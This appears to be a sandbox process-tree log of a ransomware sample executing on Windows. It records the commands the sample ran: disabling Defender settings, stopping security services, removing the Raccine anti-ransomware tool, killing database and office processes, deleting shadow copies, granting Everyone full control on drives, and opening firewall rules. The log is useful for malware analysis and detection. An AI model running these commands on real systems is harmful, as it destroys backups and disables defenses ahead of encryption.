- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    PID:4812
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4704
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:2664
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2144
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
    3⤵
    PID:4156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:5808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:5796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:5592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:5572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:5480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:5364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:5252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:4256

C:\Windows\PAExec-4396-RJMQBVDN.exe
C:\Windows\PAExec-4396-RJMQBVDN.exe -service
1⤵
PID:2248
- C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
  2⤵
  PID:4692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:5292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:4140
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:5576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4884
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:4480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:6976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:6216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:4532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:2180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:4460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:4920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5796
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:5808
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:2244
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:5108
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:3464
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:5264
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5772
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:6408
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:1504
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:4916
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:6996
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:6020
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:6384
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6040
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:4128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:7092
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:4640
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:5740
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:6440
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:5324
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:3396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:5108
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:5072
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:6288
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:5600
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:6948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:5932
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4928
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    - Kills process with taskkill
    PID:4212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:5268
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6656
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:6368
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:4404
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    - Kills process with taskkill
    PID:7132
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:4468
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:5620
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4444
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:1520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6220
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:3428
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:4732
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    PID:996
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    - Kills process with taskkill
    PID:3772
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:4580
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:4768
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:5912
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:6080
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4216
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4160
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:6644
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:5524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:3128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    PID:5940
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:2388
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6036
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:5544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:5844
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4600
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    - Kills process with taskkill
    PID:6296
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    - Kills process with taskkill
    PID:4268
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:6684
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6016
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:6580
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:7140
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:6788
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    PID:68
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4240
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:4956
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    PID:4932
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    PID:5040
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    - Kills process with taskkill
    PID:4524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    - Kills process with taskkill
    PID:5164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:3480
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4464
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6556
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    PID:5728
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    PID:5788
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /C C:\Windows\TEMP\tmpA086.bat
    3⤵
    PID:2844
  - - C:\Windows\system32\find.exe
      find "}\"
      4⤵
      PID:6424
  - - C:\Windows\system32\mountvol.exe
      mountvol
      4⤵
      PID:2236
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
      4⤵
      PID:2824
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6188
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
      4⤵
      PID:7092
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6768
  - - C:\Windows\system32\mountvol.exe
      mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
      4⤵
      PID:3964
  - - C:\Windows\system32\PING.EXE
      ping -n 2 127.0.0.1
      4⤵
      Runs ping.exe
      PID:6472
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:6816
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:5228
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:6480
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6432
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\1618038130 /grant Everyone:F /T /C /Q
    3⤵
    PID:2296
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q
    3⤵
    PID:744
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q
    3⤵
    PID:6344
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:2388
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:4468
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:4836
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q
    3⤵
    PID:5096
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\19\328 /grant Everyone:F /T /C /Q
    3⤵
    PID:5704
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\18\107002 /grant Everyone:F /T /C /Q
    3⤵
    PID:5716
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\17\193 /grant Everyone:F /T /C /Q
    3⤵
    PID:5840
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Mput\MputHistory\15\262 /grant Everyone:F /T /C /Q
    3⤵
    PID:4200
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\266D1CA4-0000-0000-0000-500600000000-0.bin /grant Everyone:F /T /C /Q
    3⤵
    PID:6184
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Network Inspection System\Support\NisLog.txt /grant Everyone:F /T /C /Q
    3⤵
    PID:6024
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:3716
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAsDlta.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:5440
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:4292
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:3940
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\MpAvDlta.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:4796
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisBase.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:2700
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Default\NisFull.vdm /grant Everyone:F /T /C /Q
    3⤵
    PID:6320
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppxProvisioning.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6212
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg /grant Everyone:F /T /C /Q
    3⤵
    PID:5724
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1280_0720_notdimmed.jpg /grant Everyone:F /T /C /Q
    3⤵
    PID:4104
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Get Help.url /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3428
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\Visit Java.com.url /grant Everyone:F /T /C /Q
    3⤵
    PID:4092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4364
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.DemoProvisioning.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:5228
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.MicrosoftRetailDemoProvisioning_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoProvisioning.appx /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3140
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6224
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.DemoHub_8wekyb3d8bbwe_License.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:2092
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.DemoHub_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.DemoHub.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:3144
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:3708
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.BasicAttractLoop_8wekyb3d8bbwe.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:5808
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.NET.Native.Runtime.1.1.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:5384
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Packages\Microsoft.BasicAttractLoop_8wekyb3d8bbwe\Microsoft.VCLibs.x64.14.00.BasicAttractLoop.appx /grant Everyone:F /T /C /Q
    3⤵
    PID:5240
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\OfflineContent\Microsoft\Content\Neutral\AppList\AppList.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4528
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\RetailDemo\Office\ConfigureO16DemoMode.bat /grant Everyone:F /T /C /Q
    3⤵
    PID:5556
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\LfSvc\Geofence\GeofenceApplicationID.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:4708
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
    3⤵
    PID:5796
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
    3⤵
    PID:868
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataCache\dmrc.idx /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6080
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\tokens.dat /grant Everyone:F /T /C /Q
    3⤵
    PID:6844
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\02305155-8ac1-1189-ff55-b7119a53887c.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4388
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\0890ad2f-b74f-c384-f684-9c33f8f67924.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4748
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\09ec127d-8158-a906-c12f-44a86e3e994f.xml /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6900
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\109c9870-7988-c77e-8ad0-376ab6e81351.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5492
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\13ba8772-845b-29a1-ae9e-fb2793ccf4ea.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:6620
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\1dae14df-4c42-28af-691e-10cc07a990b4.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:4340
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\215f9712-9fca-a3f8-5b11-660eefc73b96.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5040
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\2657f7c0-8294-58c3-f394-15fe18ba174a.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:5468
- - C:\Windows\system32\icacls.exe
    "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\28502d06-9d29-8514-1e5d-64447116d798.xml /grant Everyone:F /T /C /Q
    3⤵
    PID:1096
- - C:\Windows\system32\icacls.exe
